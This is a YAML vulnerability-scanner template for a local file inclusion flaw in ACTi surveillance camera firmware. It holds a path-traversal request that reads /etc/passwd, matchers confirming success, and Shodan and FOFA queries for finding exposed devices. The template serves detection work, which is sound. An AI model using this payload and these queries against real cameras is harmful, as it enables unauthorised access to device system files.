42 lines
1.1 KiB
YAML
42 lines
1.1 KiB
YAML
id: acti-video-lfi
|
|
|
|
info:
|
|
name: ACTi-Video Monitoring - Local File Inclusion
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
ACTI video surveillance has loopholes in reading any files
|
|
reference:
|
|
- https://www.cnblogs.com/hmesed/p/16292252.html
|
|
classification:
|
|
cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: acti
|
|
product: camera_firmware
|
|
shodan-query: title:"Web Configurator"
|
|
fofa-query: app="ACTi-视频监控"
|
|
tags: acti,lfi,iot,video,monitoring
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/images/../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402200e86ff36ec41791353ec290f40e3ef6921c3c25cdcb8746adb4447ff92f83a14022029b4474ab5bd838523d8d610bbcff05e052ba4b5417f1d1c5c8da3c7ef7a1d8a:922c64590222798bb761d5b6d8e72950 |